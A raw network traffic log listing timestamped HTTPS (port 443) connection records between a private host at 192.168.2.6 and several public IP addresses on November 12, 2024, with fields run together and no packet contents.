                                                        Nov 12, 2024 16:27:05.641738892 CET49767443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:05.641798973 CET44349767152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:05.642071009 CET49767443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:05.642080069 CET44349767152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:05.642401934 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.642410040 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.663326025 CET4434976613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.665288925 CET49762443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.665324926 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.665328026 CET49761443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.665424109 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.667321920 CET4434976813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.696541071 CET49767443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:05.742094040 CET4434976113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.742542982 CET4434976113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.742599964 CET49761443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.742613077 CET4434976113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.742624044 CET4434976113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.742686987 CET49761443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.743251085 CET49761443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.743257999 CET4434976113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.744784117 CET4434976613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.744806051 CET4434976613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.744875908 CET49766443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.744888067 CET4434976613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.745002031 CET4434976613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.745052099 CET49766443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.745609045 CET4434976813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.745793104 CET4434976813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.745892048 CET49768443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.748291016 CET49766443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.748300076 CET4434976613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.748310089 CET49766443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.748347044 CET49766443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.752758980 CET4434977213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.752846003 CET4434977213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.752892017 CET49772443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.753079891 CET4434976313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.753185987 CET4434976313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.753333092 CET49763443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.754709005 CET49772443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.754729033 CET4434977213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.754743099 CET49772443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.754749060 CET4434977213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.756350040 CET49768443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.756365061 CET4434976813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.757138014 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.757184982 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.757213116 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.757257938 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.757270098 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.757307053 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.757426977 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.757478952 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.757519960 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.757525921 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.758001089 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.758018970 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.758037090 CET4434977313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.758054018 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.758060932 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.758071899 CET4434977313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.758100033 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.758136034 CET49773443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.759478092 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.759521008 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.759609938 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.759618998 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.759804010 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.759836912 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.759856939 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.759862900 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.760075092 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.760243893 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.760322094 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.760374069 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.760380030 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.760699987 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.760751009 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.760756969 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.762989998 CET4434976413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.763051033 CET4434976413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.763158083 CET49764443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.763330936 CET4434976513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.763621092 CET49763443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.763627052 CET4434976313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.763937950 CET4434976513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.763989925 CET49765443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.771416903 CET49765443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.771423101 CET4434976513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.771771908 CET49764443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.771776915 CET4434976413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.774998903 CET49773443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.775007963 CET4434977313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.775041103 CET49773443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.775046110 CET4434977313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.784560919 CET49776443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.784584999 CET4434977613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.784698009 CET49776443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.785557032 CET49776443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.785569906 CET4434977613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.787694931 CET49777443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.787718058 CET4434977713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.787776947 CET49777443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.788167953 CET49777443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.788182020 CET4434977713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.789695978 CET49778443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.789705038 CET4434977813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.789854050 CET49778443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.791357040 CET4434976213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.791927099 CET4434976213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.792067051 CET49762443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.793373108 CET49778443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.793380976 CET4434977813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.794810057 CET49762443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.794823885 CET4434976213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.797036886 CET49779443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.797048092 CET4434977913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.797311068 CET49779443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.797544956 CET49779443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.797558069 CET4434977913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.800749063 CET49780443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.800764084 CET4434978013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.800926924 CET49780443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.801347971 CET49780443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.801362038 CET4434978013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.805915117 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.809942007 CET49781443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.809967995 CET4434978113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.810058117 CET49781443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.810637951 CET49781443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.810648918 CET4434978113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.813278913 CET49782443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.813287973 CET4434978213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.813421965 CET49782443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.813987017 CET49782443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.813999891 CET4434978213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.875125885 CET44349767152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:05.875219107 CET44349767152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:05.875272036 CET49767443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:05.875272989 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.875281096 CET44349767152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:05.875298977 CET44349767152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:05.875336885 CET49767443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:05.875705957 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.875742912 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.875751019 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.875763893 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.876065016 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.876094103 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.876107931 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.876113892 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.876127005 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.876801014 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.876837015 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.876888037 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.876894951 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.876935959 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.878750086 CET44349774159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.882314920 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.882483959 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.882517099 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.882544041 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.882553101 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.882594109 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.882786989 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.883244991 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.883272886 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.883297920 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.883301973 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.883363008 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.883466005 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.930937052 CET49774443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.932727098 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.932727098 CET49774443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.932734966 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.932744026 CET44349774159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.933192968 CET44349774159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.936877012 CET49774443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.936947107 CET44349774159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.937186956 CET49774443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.962891102 CET49767443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:05.962910891 CET44349767152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:05.977799892 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.979331017 CET44349774159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.986851931 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.987143993 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.987308025 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.987333059 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.987344027 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.987386942 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.987509966 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.987871885 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.987917900 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.987922907 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.987929106 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.987967968 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.988302946 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.988483906 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.988523960 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.988529921 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.991345882 CET49783443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:05.991363049 CET44349783152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:05.991425991 CET49783443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:05.992147923 CET49783443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:05.992161989 CET44349783152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:05.996978045 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.997353077 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.997385979 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.997406960 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.997412920 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.997452974 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.997761011 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.998155117 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.998183012 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.998207092 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.998215914 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.998302937 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.998421907 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.998790979 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.998831034 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.998850107 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.998857021 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.999129057 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.040293932 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.040302992 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.087524891 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.103131056 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.103524923 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.103559971 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.103578091 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.103590965 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.103636026 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.103641033 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.104063988 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.104093075 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.104110956 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.104115963 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.104176044 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.104518890 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.115672112 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.116234064 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.116264105 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.116377115 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.116394043 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.116444111 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.116450071 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.116976023 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.117006063 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.117014885 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.117019892 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.117206097 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.117211103 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.149669886 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.149677992 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.165292025 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.196645975 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.217859983 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.217871904 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.217940092 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.218395948 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.218405008 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.218442917 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.218450069 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.218868971 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.218911886 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.218918085 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.218952894 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.219425917 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.219432116 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.219475985 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.234493017 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.234499931 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.234551907 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.234901905 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.235035896 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.235044003 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.235086918 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.235161066 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.235502005 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.235551119 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.235557079 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.235979080 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.236047983 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.236093044 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.279217958 CET44349774159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:06.279316902 CET44349774159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:06.279373884 CET44349774159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:06.279414892 CET49774443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:06.279433966 CET49774443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:06.333112955 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.333122969 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.333201885 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.333694935 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.333702087 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.333745003 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.334363937 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.334371090 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.334405899 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.353323936 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.353398085 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.353934050 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.353987932 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.354281902 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.354331970 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.354788065 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.354837894 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.376568079 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.376621008 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.376637936 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.376676083 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.449282885 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.449294090 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.449342012 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.449667931 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.449675083 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.449712992 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.449984074 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.449990988 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.450031996 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.450740099 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.450784922 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.450793982 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.450809002 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.450860977 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.471914053 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.471976995 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.472433090 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.472479105 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.472788095 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.472834110 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.473439932 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.473484993 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.473834991 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.473881960 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.513245106 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:06.513264894 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:06.517940998 CET49774443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:06.517956972 CET44349774159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:06.521960974 CET4434977613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.522623062 CET4434977713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:06.522825003 CET49776443192.168.2.613.107.246.45
